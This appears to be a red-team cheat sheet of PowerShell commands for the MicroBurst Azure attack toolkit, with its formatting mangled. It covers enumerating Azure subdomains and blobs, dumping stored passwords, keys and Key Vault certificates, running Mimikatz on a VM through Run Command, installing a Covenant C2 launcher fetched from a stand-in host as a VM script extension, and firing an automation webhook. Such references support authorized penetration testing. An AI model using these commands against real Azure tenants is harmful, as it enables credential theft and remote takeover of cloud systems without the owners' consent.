MicroBurst
MicroBurst
Domain Enumeration (passive:
Subdomain enum:
Invoke-EnumerateAzureSubDomains -Base CLIENT -VerboseBlob enum:
Invoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123authenicate:
Connect-AzAccountCredentials:
Gather Passwords:
Get-AzPasswords -VerboseCert:
Get-AzurePasswords -Keys N -AppServices N -Verbose
# Then execute the ps file:
AuthenticateAs-XXXXX.ps1Key Vaults:
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSizeVirtual machines:
Enum:
Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,NameVM Extensions:
Get-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csvrun commands:
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtensionTriggering a webhook:
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $bodyLast updated